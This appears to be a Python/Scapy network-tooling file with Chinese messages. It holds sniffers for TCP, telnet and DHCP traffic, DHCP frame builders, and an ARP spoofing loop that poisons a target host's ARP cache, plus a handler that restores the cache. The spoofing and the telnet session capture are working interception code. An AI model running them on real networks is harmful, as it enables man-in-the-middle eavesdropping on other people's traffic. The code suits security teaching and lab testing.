def tcp_reset(src_ip, dst_ip, dst_port, ifname, src_port=None):
    """Capture packets matching a host/port BPF filter and hand each one to
    ``tcp_monitor_callback`` for session-reset handling.

    Args:
        src_ip: source host for the filter (str).
        dst_ip: destination host for the filter (str).
        dst_port: destination port as a str; it is concatenated into the
            filter, so a non-str value raises TypeError.
        ifname: interface name, resolved with ``scapy_iface`` and stored in
            the module global ``global_if`` for the callback to use.
        src_port: optional source port as a str; added to the filter when
            not None.

    Returns:
        None. ``sniff`` is called with ``store=0`` and no timeout.
    """
    global global_if
    global_if = scapy_iface(ifname)

    # NOTE(review): the filter is assembled from raw strings; the caller is
    # expected to pass validated host/port values.
    clauses = ["src host " + src_ip, "dst host " + dst_ip]
    if src_port is not None:
        clauses.append("src port " + src_port)
    clauses.append("dst port " + dst_port)
    match = " and ".join(clauses)

    print("开始匹配异常流量" + match)
    sniff(prn=tcp_monitor_callback, filter=match, iface=global_if, store=0)
def telnet_monitor(user_filter, ifname):
    """Capture traffic matching *user_filter* for 60 seconds, save it, and
    hex-dump the decoded content.

    Every packet is passed to ``telnet_monitor_callback``; the stored
    packets (``store=1``) are written to ``telnet.cap``.  ``hexdump`` is then
    called on the module-level ``string``, which is presumably filled in by
    the callback — TODO confirm.

    Args:
        user_filter: BPF filter expression.
        ifname: interface name, resolved via ``scapy_iface``.
    """
    captured = sniff(
        prn=telnet_monitor_callback,
        filter=user_filter,
        store=1,
        iface=scapy_iface(ifname),
        timeout=60,
    )
    wrpcap("telnet.cap", captured)  # persist the capture to disk
    hexdump(string)  # show the decoded content
def telnet_rst(user_filter, ifname):
    """Capture packets matching *user_filter* on *ifname* and pass each one
    to ``telnet_monitor_callback``.

    The resolved interface is kept in the module global ``global_if`` so the
    callback can reach it.  Capture runs for 60 seconds; the stored packets
    are written to ``temp.cap`` and the module-level ``string`` (presumably
    populated by the callback — TODO confirm) is printed.

    Args:
        user_filter: BPF filter expression.
        ifname: interface name.
    """
    global global_if
    global_if = scapy_iface(ifname)
    packets = sniff(
        prn=telnet_monitor_callback,
        filter=user_filter,
        store=1,
        iface=global_if,
        timeout=60,
    )
    wrpcap("temp.cap", packets)
    print(string)
def DHCP_FULL(ifname, MAC, timeout=3):
    """Send one DHCP Discover from *MAC* and capture the DHCP exchange.

    ``ifname`` is saved in the module global ``Global_IF``.  The Discover is
    dispatched through the module-level ``pool`` while ``sniff`` captures
    ports 67/68 for *timeout* seconds, handing each packet to
    ``DHCP_Monitor_Control``.

    Args:
        ifname: interface name.
        MAC: client hardware address used for the Discover.
        timeout: capture duration in seconds (default 3).
    """
    global Global_IF
    Global_IF = ifname
    # The send runs in a worker; presumably so the capture below is already
    # listening when the Discover goes out — TODO confirm.
    pool.apply_async(DHCP_Discover_Sendonly, args=(Global_IF, MAC))
    sniff(
        prn=DHCP_Monitor_Control,
        filter="port 68 and port 67",
        store=0,
        iface=scapy_iface(Global_IF),
        timeout=timeout,
    )
def sigint_handler(signum, frame):
    """SIGINT handler: restore the poisoned host's ARP cache and exit.

    Reads the module globals set by ``arp_spoof`` (``hwsrc``, ``mac_src``,
    ``hwdst``, ``src1``, ``dst1``, ``ifname1``) and sends a single ARP reply
    to ``mac_src`` mapping ``src1`` back to its real MAC ``hwdst``.  Ends
    with ``sys.exit()`` so the caller's ``while True`` loop is abandoned.

    Args:
        signum: signal number (unused).
        frame: current stack frame (unused).
    """
    global psrc, hwsrc, mac_src, hwdst, src1, dst1
    print("\n执行恢复操作!!!")
    # Corrective reply: the impersonated IP (src1) is re-associated with its
    # genuine MAC (hwdst) in the target's cache.
    restore = Ether(src=hwsrc, dst=mac_src) / ARP(
        op=2, hwsrc=hwdst, hwdst=mac_src, psrc=src1, pdst=dst1
    )
    sendp(restore, iface=scapy_iface(ifname1), verbose=False)
    time.sleep(1)
    print("已经恢复 " + src1 + " ARP缓存")
    sys.exit()
def DHCP_Request_Sendonly(ifname, options, param_req_list, wait_time=1):
    """Build and send a single DHCP Request frame; no reply is awaited.

    Args:
        ifname: interface to send on (resolved via ``scapy_iface``).
        options: dict with keys ``'MAC'``, ``'client_id'``, ``'Server_IP'``
            and ``'requested_addr'``.
        param_req_list: value for the DHCP ``param_req_list`` option.
        wait_time: seconds to sleep before sending; 0 sends immediately.
    """
    frame = (
        Ether(dst="ff:ff:ff:ff:ff:ff", src=options["MAC"], type=0x0800)
        / IP(src="0.0.0.0", dst="255.255.255.255")
        / UDP(dport=67, sport=68)
        / BOOTP(
            op=1,
            chaddr=chaddr(options["client_id"]),
            siaddr=options["Server_IP"],
        )
        / DHCP(
            options=[
                ("message-type", "request"),
                ("server_id", options["Server_IP"]),
                ("requested_addr", options["requested_addr"]),
                # client_id carries a leading hardware-type byte (1)
                ("client_id", b"\x01" + options["client_id"]),
                ("param_req_list", param_req_list),
                "end",
            ]
        )
    )
    # Only the delay is conditional; exactly one frame is sent either way.
    if wait_time != 0:
        time.sleep(wait_time)
    sendp(frame, iface=scapy_iface(ifname), verbose=False)
def arp_spoof(dst, src, ifname):
    """Repeatedly send forged ARP replies so *dst* maps *src* to this host.

    Populates the module globals consumed by ``sigint_handler`` (``src1``,
    ``dst1``, ``ifname1``, ``psrc``, ``hwsrc``, ``mac_src``, ``hwdst``),
    installs that handler for SIGINT, then loops forever sending one unicast
    ARP reply per second.  The loop ends only when ``sigint_handler`` calls
    ``sys.exit``.

    Args:
        dst: IP of the host whose ARP cache is being poisoned.
        src: IP being impersonated.
        ifname: interface name.
    """
    global psrc, hwsrc, mac_src, hwdst, src1, dst1, ifname1
    src1, dst1, ifname1 = src, dst, ifname
    psrc = GET_IP_netifaces.get_ip_address(ifname)      # local IP
    hwsrc = GET_MAC_netifaces.get_mac_address(ifname)   # local MAC
    mac_src = ARP_Request.arp_request(dst, ifname)[-1]  # real MAC of dst
    hwdst = ARP_Request.arp_request(src, ifname)[-1]    # real MAC of src
    # Ctrl+C triggers the cache-restore handler instead of a plain exit.
    signal.signal(signal.SIGINT, sigint_handler)
    while True:
        # Unicast to dst's MAC. The original notes a broadcast reply would
        # also reach the impersonated host and raise an IP-conflict alert —
        # which is exactly the artefact defenders can monitor for.
        reply = Ether(src=hwsrc, dst=mac_src) / ARP(
            op=2, hwsrc=hwsrc, psrc=src1, hwdst=mac_src, pdst=dst1
        )
        sendp(reply, iface=scapy_iface(ifname1), verbose=False)
        print("发送ARP欺骗数据包!欺骗" + dst + ',本机MAC地址为' + hwsrc + '的MAC地址!!!')
        time.sleep(1)
def DHCP_Sinffer(ifname):
    """Passively capture DHCP traffic (ports 67/68) on *ifname*.

    Each packet is handed to ``DHCP_Monitor``; nothing is stored
    (``store=0``) and no timeout is given.
    """
    interface = scapy_iface(ifname)
    sniff(
        prn=DHCP_Monitor,
        iface=interface,
        filter="port 68 and port 67",
        store=0,
    )